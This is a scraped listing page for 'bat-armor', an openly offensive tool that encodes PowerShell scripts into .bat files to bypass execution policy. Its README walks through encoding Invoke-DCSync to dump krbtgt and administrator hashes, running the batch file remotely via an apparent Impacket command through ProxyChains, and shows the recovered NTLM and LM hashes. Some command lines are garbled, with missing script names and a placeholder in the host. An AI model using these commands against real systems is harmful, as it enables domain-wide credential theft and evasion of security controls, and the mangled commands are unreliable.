Need help with bat-armor?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

131 Stars 49 Forks MIT License 5 Commits 0 Opened issues


Encode powershell payload into bat files

Services available


Need anything else?

Contributors list

# 172,643
2 commits

Bat Armor

Bypass PowerShell execution policy by encoding ps script into bat file.


Run Invoke-DCSync.ps1 to get krbtgt hash:

$ python --script-path Invoke-DCSync.ps1\
--launch-string "Invoke-DCSync -users krbtgt,administrator -alldata"\
--out krbtgt.bat --target-filepath 'c:\windows\krbtgt.bat'

$ python pentesto.loc/[email protected] -c krbtgt.bat
ProxyChains-3.1 (
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies


Hash NTLM: b8aa706788a3d8c6ac9a96684d7ff330
ntlm- 0: b8aa706788a3d8c6ac9a96684d7ff330
lm - 0: 6829621ea2044b0e931f83e0b62b4b8c

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.